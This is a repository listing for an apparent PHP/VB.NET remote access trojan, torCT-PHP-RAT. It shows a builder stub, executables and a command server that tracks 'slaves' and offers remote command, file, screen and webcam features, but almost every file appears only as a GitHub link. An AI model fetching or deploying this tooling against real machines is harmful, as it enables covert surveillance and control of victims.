├── README.md ├── bin ├── ClientSafe.txt ├── HostLink.txt ├── Webremote TorCT Client.exe └── stub.exe ├── client ├── Webremote TorCT Client │ ├── AssemblyInfo.vb │ ├── Global.vb │ ├── Webremote TorCT Client.vbproj │ ├── Webremote_TorCT_5_1.CMDScript.resources │ ├── Webremote_TorCT_5_1.Chat.resources │ ├── Webremote_TorCT_5_1.Client.resources │ ├── Webremote_TorCT_5_1.Clientpasswordwindows.resources │ ├── Webremote_TorCT_5_1.CreateServer.resources │ ├── Webremote_TorCT_5_1.FileBrowser.resources │ ├── Webremote_TorCT_5_1.Loding_Screen.resources │ ├── Webremote_TorCT_5_1.ProcessView.resources │ ├── Webremote_TorCT_5_1.Resources.resources │ ├── Webremote_TorCT_5_1.SetupClient.resources │ ├── Webremote_TorCT_5_1.ShowImageScreen.resources │ ├── Webremote_TorCT_5_1.UdpForum.resources │ ├── Webremote_TorCT_5_1.UploadFileTo.resources │ ├── Webremote_TorCT_5_1.WebOrScreenCapture.resources │ ├── Webremote_TorCT_5_1.getactivewindow.resources │ ├── Webremote_TorCT_5_1.processviewer.resources │ └── Webremote_TorCT_5_1 │ │ ├── CMDScript.vb │ │ ├── Chat.vb │ │ ├── Client.vb │ │ ├── Clientpasswordwindows.vb │ │ ├── CreateServer.vb │ │ ├── FileBrowser.vb │ │ ├── Loding_Screen.vb │ │ ├── My │ │ ├── MyApplication.vb │ │ ├── MyComputer.vb │ │ ├── MyProject.vb │ │ ├── MySettings.vb │ │ └── Resources │ │ │ └── Resources.vb │ │ ├── ProcessView.vb │ │ ├── SetupClient.vb │ │ ├── ShowImageScreen.vb │ │ ├── UdpForum.vb │ │ ├── UploadFileTo.vb │ │ ├── WebOrScreenCapture.vb │ │ ├── getactivewindow.vb │ │ └── processviewer.vb └── stub │ ├── AssemblyInfo.vb │ ├── Form1.resources │ ├── Form1.vb │ ├── Form2.resources │ ├── Form2.vb │ ├── Form3.resources │ ├── Form3.vb │ ├── Form4.resources │ ├── Form4.vb │ ├── Form5.resources │ ├── Form5.vb │ ├── Form6.resources │ ├── Form6.vb │ ├── Form7.resources │ ├── Form7.vb │ ├── Global.vb │ ├── My │ ├── MyApplication.vb │ ├── MyComputer.vb │ ├── MyProject.vb │ ├── MySettings.vb │ └── Resources │ │ └── Resources.vb │ ├── Resources.resources │ └── stub.vbproj └── server ├── AddFN.php ├── AddFNActive.php ├── AddFNDir.php ├── AddFNProcess.php ├── Chat.php ├── Chat.txt ├── ConectedTrue.php ├── Fn.txt ├── FnActiveWindow.txt ├── FnDir.txt ├── FnProcess.txt ├── IMG ├── 1.jpg ├── 2.jpg ├── 3.jpg ├── 4.jpg └── Thumbs.db ├── SlaveOnline.php ├── Slaves.txt ├── css └── style.css ├── index.php ├── log.txt ├── password.php ├── php.txt └── upload.php /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/README.md -------------------------------------------------------------------------------- /bin/ClientSafe.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /bin/HostLink.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /bin/Webremote TorCT Client.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/bin/Webremote TorCT Client.exe -------------------------------------------------------------------------------- /bin/stub.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/bin/stub.exe -------------------------------------------------------------------------------- /client/Webremote TorCT Client/AssemblyInfo.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/AssemblyInfo.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Global.vb: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote TorCT Client.vbproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote TorCT Client.vbproj -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.CMDScript.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.CMDScript.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.Chat.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.Chat.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.Client.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.Client.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.Clientpasswordwindows.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.Clientpasswordwindows.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.CreateServer.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.CreateServer.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.FileBrowser.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.FileBrowser.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.Loding_Screen.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.Loding_Screen.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.ProcessView.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.ProcessView.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.Resources.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.SetupClient.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.SetupClient.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.ShowImageScreen.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.ShowImageScreen.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.UdpForum.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.UdpForum.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.UploadFileTo.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.UploadFileTo.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.WebOrScreenCapture.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.WebOrScreenCapture.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.getactivewindow.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.getactivewindow.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1.processviewer.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1.processviewer.resources -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/CMDScript.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/CMDScript.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/Chat.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/Chat.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/Client.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/Client.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/Clientpasswordwindows.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/Clientpasswordwindows.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/CreateServer.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/CreateServer.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/FileBrowser.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/FileBrowser.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/Loding_Screen.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/Loding_Screen.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyApplication.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyApplication.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyComputer.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyComputer.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyProject.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MyProject.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MySettings.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/My/MySettings.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/My/Resources/Resources.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/My/Resources/Resources.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/ProcessView.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/ProcessView.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/SetupClient.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/SetupClient.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/ShowImageScreen.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/ShowImageScreen.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/UdpForum.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/UdpForum.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/UploadFileTo.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/UploadFileTo.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/WebOrScreenCapture.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/WebOrScreenCapture.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/getactivewindow.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/getactivewindow.vb -------------------------------------------------------------------------------- /client/Webremote TorCT Client/Webremote_TorCT_5_1/processviewer.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/Webremote TorCT Client/Webremote_TorCT_5_1/processviewer.vb -------------------------------------------------------------------------------- /client/stub/AssemblyInfo.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/AssemblyInfo.vb -------------------------------------------------------------------------------- /client/stub/Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form1.resources -------------------------------------------------------------------------------- /client/stub/Form1.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form1.vb -------------------------------------------------------------------------------- /client/stub/Form2.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form2.resources -------------------------------------------------------------------------------- /client/stub/Form2.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form2.vb -------------------------------------------------------------------------------- /client/stub/Form3.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form3.resources -------------------------------------------------------------------------------- /client/stub/Form3.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form3.vb -------------------------------------------------------------------------------- /client/stub/Form4.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form4.resources -------------------------------------------------------------------------------- /client/stub/Form4.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form4.vb -------------------------------------------------------------------------------- /client/stub/Form5.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form5.resources -------------------------------------------------------------------------------- /client/stub/Form5.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form5.vb -------------------------------------------------------------------------------- /client/stub/Form6.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form6.resources -------------------------------------------------------------------------------- /client/stub/Form6.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form6.vb -------------------------------------------------------------------------------- /client/stub/Form7.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form7.resources -------------------------------------------------------------------------------- /client/stub/Form7.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Form7.vb -------------------------------------------------------------------------------- /client/stub/Global.vb: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /client/stub/My/MyApplication.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/My/MyApplication.vb -------------------------------------------------------------------------------- /client/stub/My/MyComputer.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/My/MyComputer.vb -------------------------------------------------------------------------------- /client/stub/My/MyProject.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/My/MyProject.vb -------------------------------------------------------------------------------- /client/stub/My/MySettings.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/My/MySettings.vb -------------------------------------------------------------------------------- /client/stub/My/Resources/Resources.vb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/My/Resources/Resources.vb -------------------------------------------------------------------------------- /client/stub/Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/Resources.resources -------------------------------------------------------------------------------- /client/stub/stub.vbproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/client/stub/stub.vbproj -------------------------------------------------------------------------------- /server/AddFN.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/AddFN.php -------------------------------------------------------------------------------- /server/AddFNActive.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/AddFNActive.php -------------------------------------------------------------------------------- /server/AddFNDir.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/AddFNDir.php -------------------------------------------------------------------------------- /server/AddFNProcess.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/AddFNProcess.php -------------------------------------------------------------------------------- /server/Chat.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/Chat.php -------------------------------------------------------------------------------- /server/Chat.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/ConectedTrue.php: -------------------------------------------------------------------------------- 1 | 1 -------------------------------------------------------------------------------- /server/Fn.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/FnActiveWindow.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/FnDir.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/FnProcess.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/IMG/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/IMG/1.jpg -------------------------------------------------------------------------------- /server/IMG/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/IMG/2.jpg -------------------------------------------------------------------------------- /server/IMG/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/IMG/3.jpg -------------------------------------------------------------------------------- /server/IMG/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/IMG/4.jpg -------------------------------------------------------------------------------- /server/IMG/Thumbs.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/IMG/Thumbs.db -------------------------------------------------------------------------------- /server/SlaveOnline.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/SlaveOnline.php -------------------------------------------------------------------------------- /server/Slaves.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/css/style.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/css/style.css -------------------------------------------------------------------------------- /server/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/index.php -------------------------------------------------------------------------------- /server/log.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /server/password.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/password.php -------------------------------------------------------------------------------- /server/php.txt: -------------------------------------------------------------------------------- 1 | 203 -------------------------------------------------------------------------------- /server/upload.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/torCT-PHP-RAT/HEAD/server/upload.php --------------------------------------------------------------------------------